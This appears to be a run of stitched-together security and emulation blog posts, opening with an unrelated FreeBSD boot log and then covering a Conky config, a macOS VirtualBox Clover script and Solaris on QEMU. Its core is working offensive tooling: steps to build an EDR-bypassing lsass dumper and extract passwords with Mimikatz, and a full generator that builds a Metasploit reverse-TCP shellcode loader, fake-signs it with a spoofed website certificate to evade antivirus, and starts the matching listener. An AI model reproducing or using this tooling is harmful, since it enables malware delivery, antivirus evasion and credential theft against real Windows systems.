virtio_mmio12: <VirtIO MMIO adapter> iomem 0xa001800-0xa0019ff irq 13 on acpi0
virtio_mmio13: <VirtIO MMIO adapter> iomem 0xa001a00-0xa001bff irq 14 on acpi0
virtio_mmio14: <VirtIO MMIO adapter> iomem 0xa001c00-0xa001dff irq 15 on acpi0
virtio_mmio15: <VirtIO MMIO adapter> iomem 0xa001e00-0xa001fff irq 16 on acpi0
virtio_mmio16: <VirtIO MMIO adapter> iomem 0xa002000-0xa0021ff irq 17 on acpi0
virtio_mmio17: <VirtIO MMIO adapter> iomem 0xa002200-0xa0023ff irq 18 on acpi0
virtio_mmio18: <VirtIO MMIO adapter> iomem 0xa002400-0xa0025ff irq 19 on acpi0
virtio_mmio19: <VirtIO MMIO adapter> iomem 0xa002600-0xa0027ff irq 20 on acpi0
virtio_mmio20: <VirtIO MMIO adapter> iomem 0xa002800-0xa0029ff irq 21 on acpi0
virtio_mmio21: <VirtIO MMIO adapter> iomem 0xa002a00-0xa002bff irq 22 on acpi0
virtio_mmio22: <VirtIO MMIO adapter> iomem 0xa002c00-0xa002dff irq 23 on acpi0
virtio_mmio23: <VirtIO MMIO adapter> iomem 0xa002e00-0xa002fff irq 24 on acpi0
virtio_mmio24: <VirtIO MMIO adapter> iomem 0xa003000-0xa0031ff irq 25 on acpi0
virtio_mmio25: <VirtIO MMIO adapter> iomem 0xa003200-0xa0033ff irq 26 on acpi0
virtio_mmio26: <VirtIO MMIO adapter> iomem 0xa003400-0xa0035ff irq 27 on acpi0
virtio_mmio27: <VirtIO MMIO adapter> iomem 0xa003600-0xa0037ff irq 28 on acpi0
virtio_mmio28: <VirtIO MMIO adapter> iomem 0xa003800-0xa0039ff irq 29 on acpi0
virtio_mmio29: <VirtIO MMIO adapter> iomem 0xa003a00-0xa003bff irq 30 on acpi0
virtio_mmio30: <VirtIO MMIO adapter> iomem 0xa003c00-0xa003dff irq 31 on acpi0
virtio_mmio31: <VirtIO MMIO adapter> iomem 0xa003e00-0xa003fff irq 32 on acpi0
pcib0: <Generic PCI host controller> on acpi0
pci0: <PCI bus> on pcib0
pcib0: pci_host_generic_core_alloc_resource FAIL: type=4, rid=16, start=0000000000000080, end=000000000000009f, count=0000000000000020, flags=1400
pcib0: pci_host_generic_core_alloc_resource FAIL: type=4, rid=16, start=0000000000000040, end=000000000000007f, count=0000000000000040, flags=1800
virtio_pci0: <VirtIO PCI Network adapter> mem 0x10042000-0x10042fff,0x8000000000-0x8000003fff at device 1.0 on pci0
vtnet0: <VirtIO Networking Adapter> on virtio_pci0
vtnet0: Ethernet address: 52:54:00:12:34:56
virtio_pci1: <VirtIO PCI Block adapter> mem 0x10041000-0x10041fff,0x8000004000-0x8000007fff at device 2.0 on pci0
vtblk0: <VirtIO Block Adapter> on virtio_pci1
vtblk0: 2560MB (5242880 512 byte sectors)
virtio_pci2: <VirtIO PCI Block adapter> mem 0x10040000-0x10040fff,0x8000008000-0x800000bfff at device 3.0 on pci0
vtblk1: <VirtIO Block Adapter> on virtio_pci2
vtblk1: 0MB (385 512 byte sectors)
acpi_button0: <Power Button> on acpi0
acpi0: Could not update all GPEs: AE_NOT_CONFIGURED
cryptosoft0: <software crypto>
Timecounters tick every 1.000 msec
usb_needs_explore_all: no devclass
CPU 0: ARM Cortex-A53 r0p4 affinity: 0
Instruction Set Attributes 0 = <AES+PMULL,SHA1,SHA2,CRC32>
Instruction Set Attributes 1 = <>
Processor Features 0 = <AdvSIMD,Float,EL3 32,EL2 32,EL1 32,EL0 32>
Processor Features 1 = <0>
Memory Model Features 0 = <4k Granule,64k Granule,MixedEndian,S/NS Mem,16bit ASID,1TB PA>
Memory Model Features 1 = <>
Memory Model Features 2 = <32b CCIDX,48b VA>
Debug Features 0 = <2 CTX Breakpoints,4 Watchpoints,6 Breakpoints,PMUv3,Debug v8>
Debug Features 1 = <0>
Auxiliary Features 0 = <0>
Auxiliary Features 1 = <0>
Trying to mount root from ufs:/dev/ufs/rootfs [rw]...
WARNING: WITNESS option enabled, expect reduced performance.
lo0: link state changed to UP
vtnet0: link state changed to UP

There were some people asking what is the Conky theme and configuration I use on my desktop

Well I don’t know what should I call this but the configuration is shown below, this should be saved as ~./conky/conky.cfg

• Please do not forget to change the network interface names (since I use wlp9s0 for my wifi)
• Also the battery/ACPI stuff should be tuned to your HW.   Mine should work on a Panasonic CF-53

own_window yes
own_window_transparent yes
own_window_type desktop
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
own_window_argb_visual true
own_window_argb_value 0
out_to_console no
own_window_class Conky
own_window_type normal 
own_window_transparent yes
use_xft yes
xftfont cure:size=8
update_interval 2
cpu_avg_samples 2
net_avg_samples 2
double_buffer yes
maximum_width 320
draw_shades no
draw_outline no
draw_borders no
stippled_borders 1
border_width 20
default_color white
default_shade_color white
default_outline_color white
alignment top_right
gap_x 15
gap_y 0
use_spacer left
no_buffers yes
uppercase no

TEXT
${color}${alignc}${time %A %d of %B, %Y}${color lightgrey} | ${color}${time %H:%M:%S}

${color}${alignc}${color lightgrey}Uptime: ${color}$uptime${color lightgrey} | ${color lightgrey}Load: $color$loadavg

${color lightgrey}${alignc}Battery :$color ${battery}${color lightgrey} | ${color lightgrey}ET: ${color}$battery_time
${alignc}${color #14A734}${battery_bar 8,300}
${color #656565}$stippled_hr$color
${color} $wireless_essid${alignr}${color lightgrey}| ${color lightgrey}Signal:${color}${wireless_link_qual_perc wlp9s0}%

${color lightgrey} Down:${color}${downspeedf wlp9s0} KB/s${alignr}${color lightgrey}Up:${color}${upspeedf wlp9s0} KB/s 
${color #000000}${downspeedgraph wlp9s0 12,140 000000 14A734}${alignr}${color #000000}${upspeedgraph wlp9s0 12,140 000000 14A734}
${color lightgrey} Total: $color${totaldown wlp9s0}${alignr}${color lightgrey}Total: ${color}${totalup wlp9s0} 
${color #656565}$stippled_hr$color
${alignc}${color}${execi 1000 cat /proc/cpuinfo | grep 'model name' | sed -e 's/model name.*: //'| uniq}
${alignc}${color #000000}${cpugraph 13,318 000000 14A734}

${color lightgrey}Total CPU Usage: ${color}${cpu cpu0}%${alignr}${color lightgrey}| ${color lightgrey}CPU Temperature: ${color}${hwmon 1 temp 1}°C

${color lightgrey} C1: ${color}${cpu cpu1}% ${color lightgrey}@ ${color}${freq 1} MHz${color #14A734}${alignr}${color lightgrey}C2: ${color}${cpu cpu2}% ${color lightgrey}@ ${color}${freq 2} MHz 
${color #14A734}${cpubar cpu1 6,150}${alignr}${color #14A734}${cpubar cpu2 6,150}
${color lightgrey} C3: ${color}${cpu cpu3}% ${color lightgrey}@ ${color}${freq 3} MHz${color #14A734}${alignr}${color lightgrey}C4: ${color}${cpu cpu4}% ${color lightgrey}@ ${color}${freq 4} MHz 
${color #14A734}${cpubar cpu3 6,150}${alignr}${color #14A734}${cpubar cpu4 6,150}
${color #656565}$stippled_hr$color
${alignc}${color lightgrey}Resources

${color lightgrey}Ram ${alignc} ${color}$mem${color lightgrey} / ${color}$memmax ${alignr}${memperc}% Used
${color #14A734}${membar 6,318}
${color lightgrey}Swap ${alignc} ${color}${swap}${color lightgrey} / ${color}${swapmax} ${alignr}${swapperc}% Used
${color #14A734}${swapbar 6,318}
${color lightgrey}$fs_type ${alignc} ${color}${fs_used}${color lightgrey} / ${color}${fs_size} ${alignr}${fs_used_perc /}% Used
${color #14A734}${fs_bar 6,318 /}
${color lightgrey}Disk Read IO: $color${diskio_read}${alignr}${color lightgrey}Disk Write IO: ${color}${diskio_write}
${color #000000}${diskiograph_read 12,145 000000 14A734}${alignr}${color #000000}${diskiograph_write 12,145 000000 14A734}
${color #656565}$stippled_hr$color

Short howto on how to build a custom Clover.iso for your VirtualBox Mojave emulation. You will need an existing macOS system either real or virtual (VirtualBox) for the script to prepare the clove.iso

Below is an example script that will produce a 1980×1080 resolution Clover.iso which you then need to use in the Virtual Box emulation to load Mojave.

Please read the previous howtos on how to do this here https://astr0baby.wordpress.com/2018/08/03/installing-mojave-10-14-beta-in-virtualbox-5-2-16-on-linux-x86_64/

Updated clover.sh script (chmod +x clover.sh)

#!/bin/bash

curl -Lk https://raw.githubusercontent.com/AlexanderWillner/runMacOSinVirtualBox/master/config.plist -o config.plist

# We will set a custom resolution here 1980x1080 
sed -i -e 's/1680x1050/1980x1080/g' config.plist

#### Please replace your path to the apfs.efi on your macOS installation #####
cp "/Volumes/Macintosh HD/usr/standalone/i386/apfs.efi" "./apfs.efi"
#### Please replace your path to the apfs.efi on your macOS installation #####


curl -Lk https://sourceforge.net/projects/cloverefiboot/files/Bootable_ISO/CloverISO-4533.tar.lzma/download -o clover.tar.lzma
sleep 1
xz -d clover.tar.lzma
tar xf clover.tar
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/ 2>/dev/null || true
hdiutil attach Clover-v2.4k-4533-X64.iso
hdiutil create -megabytes 16 -fs MS-DOS -volname MojaveClover -o ./clover.dmg
hdiutil detach /Volumes/NO\ NAME/ 2>/dev/null || true
hdiutil attach ./clover.dmg
cp -r /Volumes/Clover-v2.4k-4533-X64/* /Volumes/NO\ NAME/
cp ./config.plist /Volumes/NO\ NAME/EFI/CLOVER/
cp ./apfs.efi /Volumes/NO\ NAME/EFI/CLOVER/drivers64UEFI/


hdiutil detach /Volumes/Clover-v2.4k-4533-X64/
hdiutil detach /Volumes/NO\ NAME/
hdiutil makehybrid -iso -joliet -o ./clover.iso ./clover.dmg

Also we could use the above example to modify other things (this I leave to the reader to experiment with) For example these SIP  security settings in the default clover – disabled completely.

CsrActiveConfig
0x67

We could change it to match what you want -> 0x0

csr-active-config 0x0 = SIP Enabled (Default)
csr-active-config 0x3 = SIP Partially Disabled (Loads unsigned kexts)
csr-active-config 0x67 = SIP Disabled completely

Here is the mandatory VirtualBox 1980×1080 script that needs to be executed prior to loading Mojave

#!/bin/bash
readonly VM_RES="1980x1080"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Once you have all in place – you will get the 1980×1080 resolution working in the VirtualBox Mojave emulation

Also for the hasty you can get the clove4k.iso here -> https://drop.me/M3pZW7

Ultra short entry here. When reading a very interesting article on bypassing one End Point Security product to silently dump lsass.exe without getting detected  https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

One will want to reproduce the steps of course and since the code is available here :

https://github.com/hoangprod/AndrewSpecial/tree/master

I have just done that in my lab.

Below might save some seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64bit to build it)

# On Windows build server just download the master.zip 
https://github.com/hoangprod/AndrewSpecial/archive/master.zip

Modify AndrewSpecial.h to include the additional #pragma comment (lib, “advapi32.lib”)

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

enum supported_versions
{
win8 = 0x060200,
win81 = 0x060300,
win10 = 0x0A0000,
};

Open up the 64bit VS2013 x64 Native Tools Command Prompt  and cd to the source directory

cl *.cpp /DUNICODE

Next we transfer the compiled Andrew.exe binary to our testing lab Windows 10 box and execute it

The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords

Courtesy of CaledoniaProject

https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64

I have been using this generator for quite a while and it has always worked for me. Decided to enhance it with an additional function that spoofs certificates from websites and signs executable from them, original concept is from here https://github.com/paranoidninja/CarbonCopy

My code is 100% compatible with Linux Mint, but should work with Ubuntu and Debian derivatives.  Why Im saying this is that I have added some dependency checks into the generator. In my case I using dpkg-query to probe if required packages are installed or not. The script below can be obviously modified to work on CentOS, RedHat and other distros as  long as one gets the proper package checks in place, this I leave for the reader to practice on.

Below is the source code of the Generator script, that would produce a 64bit Windows PE32 binary file with meterpreter loader server address and port hardcoded inside and spoof-signed by website of our choice (google.com for example) Of course the signed binary is not obviously verified by Windows, but it adds an extra layer of complexity to AV engines to check.

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Based on NinjaParanoid's CarbonCopy "
echo " "
echo " For Debian based system Ubuntu/Mint "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************"

# Check if we are on Debian/Ubuntu 
if [ $(which dpkg-query | grep -c "dpkg-query") -eq 0 ]; 
then echo "[-] no dpkg-query found in path, not Debian/Ubuntu based system, manually change the scipt" 
echo " This script relies on dpkg-query to check for required packages, if running on other platform" 
echo " Simply remove the section starting from #Debian-start and finishing at #Debian-end" 
echo " Make sure you manually install the dependant packages" 
echo ""
echo "- mingw-w64 "
echo "- python-openssl" 
echo "- osslsigncode" 
exit
fi

echo "[*] Checking if required software is installed " 
dpkg --get-selections mingw-w64 python-openssl osslsigncode 
if [ $(dpkg-query -W -f='${Status}' mingw-w64 2>/dev/null | grep -c "ok installed") -eq 0 ]; 
then echo "[-] Missing mingw-w64 run apt-get install mingw-w64"
exit
fi
if [ $(dpkg-query -W -f='${Status}' python-openssl 2>/dev/null | grep -c "ok installed") -eq 0 ]; 
then echo "[-] Missing python-openssl run apt-get install python-openssl"
exit
fi
if [ $(dpkg-query -W -f='${Status}' osslsigncode 2>/dev/null | grep -c "ok installed") -eq 0 ];
then echo "[-] Missing osslsigncode apt-get install osslsigncode"
exit
fi

echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port 
echo -en 'Impersonate Certificate https site (www.google.com): ' 
read hostname
echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char lambert[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char omega[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(15);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(lambert, atoi(omega));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

#Cleanup previous run 
rm -f carboncopy.py
cat <<EOF >> carboncopy.py
#!/usr/bin/python3

##Author : Paranoid Ninja
##Email : paranoidninja@protonmail.com
##Descr : Spoofs SSL Certificates and Signs executables to evade Antivirus


from OpenSSL import crypto
from sys import argv, platform
import ssl
import os
import subprocess

def CarbonCopy(host, port, signee, signed):

try:
#Fetching Details
print("[+] Loading public key of %s in Memory..." % host)
ogcert = ssl.get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)

certDir = r'certs'
if not os.path.exists(certDir):
os.makedirs(certDir)

#Creating Fake Certificate
CNCRT = certDir + "/" + host + ".crt"
CNKEY = certDir + "/" + host + ".key"
PFXFILE = certDir + "/" + host + '.pfx'

#Creating Keygen
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()

#Setting Cert details from loaded from the original Certificate
print("[+] Cloning Certificate Version")
cert.set_version(x509.get_version())
print("[+] Cloning Certificate Serial Number")
cert.set_serial_number(x509.get_serial_number())
print("[+] Cloning Certificate Subject")
cert.set_subject(x509.get_subject())
print("[+] Cloning Certificate Issuer")
cert.set_issuer(x509.get_issuer())
print("[+] Cloning Certificate Registration & Expiration Dates")
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
print("[+] Signing Keys")
cert.sign(k, 'sha256')

print("[+] Creating %s and %s" %(CNCRT, CNKEY))
open(CNCRT, "wt").write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
open(CNKEY, "wt").write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k).decode('utf-8'))
print("[+] Clone process completed. Creating PFX file for signing executable...")

pfx = crypto.PKCS12Type()
pfx.set_privatekey(k)
pfx.set_certificate(cert)
pfxdata = pfx.export()

with open((PFXFILE), 'wb') as pfile:
pfile.write(pfxdata)

if (platform == "win32"):
print("[+] Platform is Windows OS...")
print("[+] Signing %s with signtool.exe..." %(signed))
print(subprocess.check_output("copy " + signee + " " + signed, shell=True).decode())
print(subprocess.check_output("signtool.exe sign /v /f " + PFXFILE + " /d \"MozDef Corp\" /tr \"http://sha256timestamp.ws.symantec.com/sha256/timestamp\" /td SHA256 /fd SHA256 " + signed, shell=True).decode())

else:
print("[+] Platform is Linux OS...")
print("[+] Signing %s with %s using osslsigncode..." %(signee, PFXFILE))
args = ("osslsigncode", "sign", "-pkcs12", PFXFILE, "-n", "Notepad Benchmark Util", "-i", "http://sha256timestamp.ws.symantec.com/sha256/timestamp", "-in", signee, "-out", signed)
popen = subprocess.Popen(args, stdout=subprocess.PIPE)
popen.wait()
output = popen.stdout.read()
print("[+] " + output.decode('utf-8'))

except Exception as ex:
print("[X] Something Went Wrong!\n[X] Exception: " + str(ex))

def main():
if (len(argv) != 5):
print(""" +-+-+-+-+-+-+-+-+-+-+-+-+
|C|a|r|b|o|n|S|i|g|n|e|r|
+-+-+-+-+-+-+-+-+-+-+-+-+""")
print("\n CarbonSigner v1.0\n Author: Paranoid Ninja\n\n[+] Descr: Impersonates the Certificate of a website\n[!] Usage: " + argv[0] + " <hostname> <port> <build-executable> <signed-executable>\n")
else:
print(""" +-+-+-+-+-+-+-+-+-+-+-+-+
|C|a|r|b|o|n|S|i|g|n|e|r|
+-+-+-+-+-+-+-+-+-+-+-+-+""")
print("\n CarbonSigner v1.0\n Author: Paranoid Ninja\n")
CarbonCopy(argv[1], argv[2], argv[3], argv[4])

if __name__=="__main__":
main()

EOF

python ./carboncopy.py $hostname 443 ./payload.exe ./payload-signed.exe
ls -la ./payload-signed.exe 
osslsigncode verify ./payload-signed.exe

Also here is the listener part (you need to run this from where you metasploit-framework is installed in)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

It gets its job done, and we can run a meterpreter shell on the latest Windows 10.0.17134.556 build with up2date Defender.

Of course try not to do anything silly process migration, you will get zapped immediately by MS Defeneder now :)

MS is getting better and better :)

This is going to be a straight forward continuation of the last Solaris article about qemu-system-sparc emulation (32bit SPARC) which I have covered here https://astr0baby.wordpress.com/2018/09/22/running-solaris-2-6-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/ 

Good source of information is Artyom Tarasenko’s blog entry about Solaris SPARC and qemu http://tyom.blogspot.com/2009/12/solaris-under-qemu-how-to.html

We are going to continue with the Solaris 5.9  or better known as Solaris 9 for SPARC architecture emulation on x86_64 Linux and qemu-system-sparc

I will describe how I got the system to install using the previous Solaris 5.6 installed disk images, in order to save time creating the disk partitions from scratch (which was a bit of a challenge with 5.6)

My version of Qemu is as follows

$ qemu-system-sparc --version
QEMU emulator version 3.0.91 (v3.1.0-rc1-16-g83c496599c-dirty)
Copyright (c) 2003-2018 Fabrice Bellard and the QEMU Project developers

What we will obviously need is the Solaris 9 SPARC installation ISO media.  Here you can get the Solaris 9 9/05 DVD ISO -> https://ufile.io/9qscc

My QEMU 32bit SPARC environment looks like this  and I will explain exact steps that I took to install it

-rw-r--r--  1 user user 2386624512 Jan 27 01:25 disk2.6.img
-rw-r--r--  1 root root 1261174784 Sep 25 00:15 disk2.7.img
-rw-r--r--  1 user user 3733192704 Feb 23 01:42 disk2.9.img
-rwxr-xr-x  1 user user        195 Sep 24 21:40 run-2.6.sh
-rwxr-xr-x  1 root root        195 Sep 24 22:30 run-2.7.sh
-rwxr-xr-x  1 root root        134 Feb 23 01:07 run-2.9-install.sh
-rwxr-xr-x  1 user user        134 Feb 23 01:07 run-2.9.sh
-rw-r--r--  1 user user  565862400 Feb 21  2010 solaris-2.6-sparc.iso
-rw-r--r--  1 root root  647471104 Feb 21  2010 solaris-2.7-sparc.iso
-rw-r--r--  1 root root 3104112640 Feb 22 23:26 solaris-2.9-sparc.iso
-rw-rw-r--  1 user user     262144 Sep 19 21:24 ss5.bin

Next we will configure the networking and the /etc/qemu-ifup script.  Networking script can be saved in the emulation directory and needs to be executed with root privileges prior running qemu (you should adjust to your needs here -> enp0s25 is eth0 and wlp9s0 is wlan0 )  lets call this network.sh

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Here is my slightly modified /etc/qemu-ifup script

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

I usually setup the internal network in emulated Solaris as follows then:

• interface: 10.0.2.10
• gateway : 10.0.2.2
• nameserver: 8.8.8.8

INSTALLING SOLARIS 9

The run-2.9-install.sh script is as follows

qemu-system-sparc -L . -m 256 -M SS-5  -hda ./disk2.9.img -cdrom ./solaris-2.9-sparc.iso -net nic -net tap  -boot d  -display vnc=:1

Use your VNC client to connect to :1 to interact with the emulation then

The disk2.9.img is a QCOW2 image from the previous Solaris 2.6 installation which we can use (please follow the https://astr0baby.wordpress.com/2018/09/22/running-solaris-2-6-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/) to create one or start from scratch…

# qemu-img info disk2.9.img
image: disk2.9.img
file format: qcow2
virtual size: 36G (38654705664 bytes)
disk size: 3.5G
cluster_size: 65536
Format specific information:
    compat: 1.1
    lazy refcounts: false
    refcount bits: 16
    corrupt: false

We are not using the ss5.bin firmware file anymore, since qemu-system-sparc can handle Solaris 9 SPARC quite well without it, for GUI we will use qemu inbuilt VNC

The installation is again straight forward (do not upgrade the system from 5.6 to 5.9 but rather initialize the disk during setup and use default options)

Once we get this installed (takes some time, be patient) we can use the following script to boot the system from disk  – Use your VNC client to connect to :1

qemu-system-sparc -L . -m 256 -M SS-5 -hda ./disk2.9.img -cdrom ./solaris-2.9-sparc.iso -net nic -net tap -boot c -display vnc=:1

So now we should have a fully working latest Solaris 9 9/05 which can be reachable via 10.0.2.10 for example with ssh or telnet or ftp … and operated via VNC :1

A default installation of Solaris 9 of course leaves many “unsecure” and obsolete daemons exposed, so just for the heck of it here is an Nmap scan

Solaris9 is way much better to work with than any other Unix systems I came across :)

Also do not forget to configure your DNS resolver as follows (Google and Cloudflare DNS)

# echo "nameserver 8.8.8.8 \nnameserver 1.1.1.1" > > /etc/resolv.conf

# vi /etc/nsswitch.conf
hosts: files dns

# pkill -HUP inet

Here is a short video of the actual emulation

So after we have managed to fully virtualize Solaris 5.6/5.7/5.8 and 5.9 via qemu-system-sparc on x86_64 Linux host we can move onto testing the infamous Shadowbrokers leaked Solaris hacking tools – mainly the notorious ebbisland

If you want to experiment a git clone of the EQGRP dump is located here https://github.com/x0rz/EQGRP

So lets fire up our first test case – Solaris 5.9 (sparc) via qemu-system-sparc as it was described here ( https://astr0baby.wordpress.com/2019/02/23/running-solaris-2-9-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/)  We need to make sure the rpc.bootparamd is running on the target (needed for this example)

On our host Linux machine we need to ensure that the vulnerable rpc service(bootparam) is running. You must be able to reach the target system’s TCP port that the designated target RPC is listening upon, so we will use rpcinfo to query the remote rpc services

Make sure you have it installed ->  apt-get install rpcbind  nfs-common

